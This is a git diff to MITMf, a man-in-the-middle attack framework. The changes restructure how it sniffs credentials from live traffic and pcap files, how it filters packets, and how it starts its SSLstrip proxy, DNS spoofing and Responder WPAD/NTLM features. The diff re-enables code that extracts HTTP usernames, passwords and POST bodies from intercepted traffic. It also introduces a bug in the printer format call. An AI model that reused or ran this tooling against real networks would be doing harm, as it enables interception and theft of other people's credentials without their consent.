diff --git a/core/configwatcher.py b/core/configwatcher.py index 7f7b955..95716de 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -21,7 +21,7 @@ import pyinotify import threading from configobj import ConfigObj -class ConfigWatcher(pyinotify.ProcessEvent): +class ConfigWatcher(pyinotify.ProcessEvent, object): @property def config(self): diff --git a/core/netcreds.py b/core/netcreds.py index 5daa6b8..f4b4723 100644 --- a/core/netcreds.py +++ b/core/netcreds.py @@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' # Prone to false+ but prefer that to false- http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' +parsing_pcap = False + class NetCreds: version = "1.0" @@ -51,15 +53,64 @@ class NetCreds: except Exception as e: if "Interrupted system call" in e: pass - def start(self, interface, ip, pcap): - if pcap: - for pkt in PcapReader(pcap): - pkt_parser(pkt) - sys.exit() - else: - t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) - t.setDaemon(True) - t.start() + def start(self, interface, ip): + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) + t.setDaemon(True) + t.start() + + def parse_pcap(self, pcap): + parsing_pcap=True + + for pkt in PcapReader(pcap): + pkt_parser(pkt) + + sys.exit() + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) def pkt_parser(pkt): ''' @@ -127,53 +178,7 @@ def pkt_parser(pkt): telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) # HTTP and other protocols that run on TCP + a raw load - other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - -def frag_remover(ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - global pkt_frag_loads - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(pkt_frag_loads) > 50: - pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] - -def frag_joiner(ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in pkt_frag_loads: - if src_ip_port == ip_port: - if ack in pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True) def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): ''' @@ -530,14 +535,14 @@ def irc_logins(full_load, pkt): msg = 'IRC pass: %s' % pass_search2.group(1) return msg -def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): ''' Pull out pertinent info from the parsed HTTP packet data ''' user_passwd = None http_url_req = None method = None - http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_line, header_lines, body = parse_http_load(full_load, http_methods) headers = headers_to_dict(header_lines) if 'host' in headers: @@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): else: host = '' - #if http_line != None: - # method, path = parse_http_line(http_line, http_methods) - # http_url_req = get_http_url(method, host, path, headers) - #if http_url_req != None: - #printer(src_ip_port, None, http_url_req) + if parsing_pcap is True: - # Print search terms - searched = get_http_searches(http_url_req, body, host) - if searched: - printer(src_ip_port, dst_ip_port, searched) + if http_line != None: + method, path = parse_http_line(http_line, http_methods) + http_url_req = get_http_url(method, host, path, headers) + if http_url_req != None: + if verbose == False: + if len(http_url_req) > 98: + http_url_req = http_url_req[:99] + '...' + printer(src_ip_port, None, http_url_req) - #We dont need this cause its being taking care of by the proxy - - #Print user/pwds - #if body != '': - # user_passwd = get_login_pass(body) - # if user_passwd != None: - # try: - # http_user = user_passwd[0].decode('utf8') - # http_pass = user_passwd[1].decode('utf8') - # # Set a limit on how long they can be prevent false+ - # if len(http_user) > 75 or len(http_pass) > 75: - # return - # user_msg = 'HTTP username: %s' % http_user - # printer(src_ip_port, dst_ip_port, user_msg) - # pass_msg = 'HTTP password: %s' % http_pass - # printer(src_ip_port, dst_ip_port, pass_msg) - # except UnicodeDecodeError: - # pass + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) - # Print POST loads - # ocsp is a common SSL post load that's never interesting - #if method == 'POST' and 'ocsp.' not in host: - # try: - # msg = 'POST load: %s' % body.encode('utf8') - # printer(src_ip_port, None, msg) - # except UnicodeDecodeError: - # pass + # Print user/pwds + if body != '': + user_passwd = get_login_pass(body) + if user_passwd != None: + try: + http_user = user_passwd[0].decode('utf8') + http_pass = user_passwd[1].decode('utf8') + # Set a limit on how long they can be prevent false+ + if len(http_user) > 75 or len(http_pass) > 75: + return + user_msg = 'HTTP username: %s' % http_user + printer(src_ip_port, dst_ip_port, user_msg) + pass_msg = 'HTTP password: %s' % http_pass + printer(src_ip_port, dst_ip_port, pass_msg) + except UnicodeDecodeError: + pass + + # Print POST loads + # ocsp is a common SSL post load that's never interesting + if method == 'POST' and 'ocsp.' not in host: + try: + if verbose == False and len(body) > 99: + # If it can't decode to utf8 we're probably not interested in it + msg = 'POST load: %s...' % body[:99].encode('utf8') + else: + msg = 'POST load: %s' % body.encode('utf8') + printer(src_ip_port, None, msg) + except UnicodeDecodeError: + pass # Kerberos over TCP decoded = Decode_Ip_Packet(str(pkt)[14:]) @@ -904,7 +916,7 @@ def get_login_pass(body): def printer(src_ip_port, dst_ip_port, msg): if dst_ip_port != None: - print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg) + print_str = '[{} > {}] {}'.format((src_ip_port, dst_ip_port, msg)) # All credentials will have dst_ip_port, URLs will not log.info("{}".format(print_str)) diff --git a/core/packetfilter.py b/core/packetfilter.py index e8f0d5d..ba0a962 100644 --- a/core/packetfilter.py +++ b/core/packetfilter.py @@ -1,5 +1,3 @@ -import threading - from core.utils import set_ip_forwarding, iptables from core.logger import logger from scapy.all import * @@ -21,9 +19,7 @@ class PacketFilter: self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) - t = threading.Thread(name='packetparser', target=self.nfqueue.run) - t.setDaemon(True) - t.start() + self.nfqueue.run() def modify(self, pkt): #log.debug("Got packet") diff --git a/core/proxyplugins.py b/core/proxyplugins.py index efb1833..7ea6c54 100644 --- a/core/proxyplugins.py +++ b/core/proxyplugins.py @@ -108,9 +108,10 @@ class ProxyPlugins: log.debug("hooking {}()".format(fname)) #calls any plugin that has this hook try: - for f in self.plugin_mthds[fname]: - a = f(**args) - if a != None: args = a + if self.plugin_mthds: + for f in self.plugin_mthds[fname]: + a = f(**args) + if a != None: args = a except Exception as e: #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) log.error("Exception occurred in hooked function") diff --git a/mitmf.py b/mitmf.py index 08a8b73..809cb0b 100755 --- a/mitmf.py +++ b/mitmf.py @@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver #add MITMf options sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") -sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") +sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') @@ -73,6 +73,15 @@ options = parser.parse_args() #Set the log level logger().log_level = logging.__dict__[options.log_level.upper()] +from core.logger import logger +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +log = logger().setup_logger("MITMf", formatter) + +from core.netcreds import NetCreds + +if options.read_pcap: + NetCreds().parse_pcap(options.read_pcap) + #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object from core.utils import get_ip, get_mac, shutdown options.ip = get_ip(options.interface) @@ -80,33 +89,18 @@ options.mac = get_mac(options.interface) settings.Config.populate(options) -from core.logger import logger -formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") -log = logger().setup_logger("MITMf", formatter) - log.debug("MITMf started: {}".format(sys.argv)) #Start Net-Creds -from core.netcreds import NetCreds -NetCreds().start(options.interface, options.ip, options.read_pcap) +print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) + +NetCreds().start(options.interface, options.ip) +print "|" +print "|_ Net-Creds v{} online".format(NetCreds.version) -from core.sslstrip.CookieCleaner import CookieCleaner from core.proxyplugins import ProxyPlugins -from core.sslstrip.StrippingProxy import StrippingProxy -from core.sslstrip.URLMonitor import URLMonitor - -URLMonitor.getInstance().setFaviconSpoofing(options.favicon) -URLMonitor.getInstance().setCaching(options.preserve_cache) -CookieCleaner.getInstance().setEnabled(options.killsessions) - -strippingFactory = http.HTTPFactory(timeout=10) -strippingFactory.protocol = StrippingProxy - -reactor.listenTCP(options.listen_port, strippingFactory) ProxyPlugins().all_plugins = plugins - -print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) for plugin in plugins: #load only the plugins that have been called at the command line @@ -126,48 +120,63 @@ for plugin in plugins: for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) - plugin.reactor(strippingFactory) plugin.start_config_watch() -print "|" -print "|_ Sergio-Proxy v0.2.1 online" -print "|_ SSLstrip v0.9 by Moxie Marlinspike online" -print "|" - if options.filter: from core.packetfilter import PacketFilter pfilter = PacketFilter(options.filter) - pfilter.start() print "|_ PacketFilter online" - print "| |_ Applying filter {} to incoming packets".format(options.filter) + print " |_ Applying filter {} to incoming packets".format(options.filter) + try: + pfilter.start() + except KeyboardInterrupt: + pfilter.stop() + shutdown() -print "|_ Net-Creds v{} online".format(NetCreds.version) +else: + from core.sslstrip.CookieCleaner import CookieCleaner + from core.sslstrip.StrippingProxy import StrippingProxy + from core.sslstrip.URLMonitor import URLMonitor -#Start mitmf-api -from core.mitmfapi import mitmfapi -print "|_ MITMf-API online" -mitmfapi().start() + URLMonitor.getInstance().setFaviconSpoofing(options.favicon) + URLMonitor.getInstance().setCaching(options.preserve_cache) + CookieCleaner.getInstance().setEnabled(options.killsessions) -#Start the HTTP Server -from core.servers.HTTP import HTTP -HTTP().start() -print "|_ HTTP server online" + strippingFactory = http.HTTPFactory(timeout=10) + strippingFactory.protocol = StrippingProxy -#Start DNSChef -from core.servers.DNS import DNSChef -DNSChef().start() -print "|_ DNSChef v{} online".format(DNSChef.version) + reactor.listenTCP(options.listen_port, strippingFactory) -#Start the SMB server -from core.servers.SMB import SMB -SMB().start() -print "|_ SMB server online\n" + for plugin in plugins: + if vars(options)[plugin.optname] is True: + plugin.reactor(strippingFactory) -#start the reactor -reactor.run() -print "\n" + print "|_ Sergio-Proxy v0.2.1 online" + print "|_ SSLstrip v0.9 by Moxie Marlinspike online" -if options.filter: - pfilter.stop() + #Start mitmf-api + from core.mitmfapi import mitmfapi + print "|" + print "|_ MITMf-API online" + mitmfapi().start() -shutdown() \ No newline at end of file + #Start the HTTP Server + from core.servers.HTTP import HTTP + HTTP().start() + print "|_ HTTP server online" + + #Start DNSChef + from core.servers.DNS import DNSChef + DNSChef().start() + print "|_ DNSChef v{} online".format(DNSChef.version) + + #Start the SMB server + from core.servers.SMB import SMB + SMB().start() + print "|_ SMB server online\n" + + #start the reactor + reactor.run() + print "\n" + + shutdown() \ No newline at end of file diff --git a/plugins/plugin.py b/plugins/plugin.py index f42efd6..c90d01f 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -31,6 +31,7 @@ class Plugin(ConfigWatcher): def __init__(self, parser): '''Passed the options namespace''' + if self.desc: sgroup = parser.add_argument_group(self.name, self.desc) else: diff --git a/plugins/responder.py b/plugins/responder.py index 983a904..2f36be3 100644 --- a/plugins/responder.py +++ b/plugins/responder.py @@ -91,5 +91,5 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server") - options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)") + options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/spoof.py b/plugins/spoof.py index 0d6f46b..9d03718 100644 --- a/plugins/spoof.py +++ b/plugins/spoof.py @@ -70,7 +70,7 @@ class Spoof(Plugin): if options.dns: self.tree_info.append('DNS spoofing enabled') - if iptables().dns is False: + if iptables().dns is False and options.filter is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: @@ -78,7 +78,7 @@ class Spoof(Plugin): set_ip_forwarding(1) - if iptables().http is False: + if iptables().http is False and options.filter is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: diff --git a/plugins/sslstrip+.py b/plugins/sslstrip+.py index 109e721..9266040 100644 --- a/plugins/sslstrip+.py +++ b/plugins/sslstrip+.py @@ -33,7 +33,7 @@ class SSLstripPlus(Plugin): from core.servers.DNS import DNSChef from core.utils import iptables - if iptables().dns is False: + if iptables().dns is False and options.filter is False: iptables().DNS(self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass()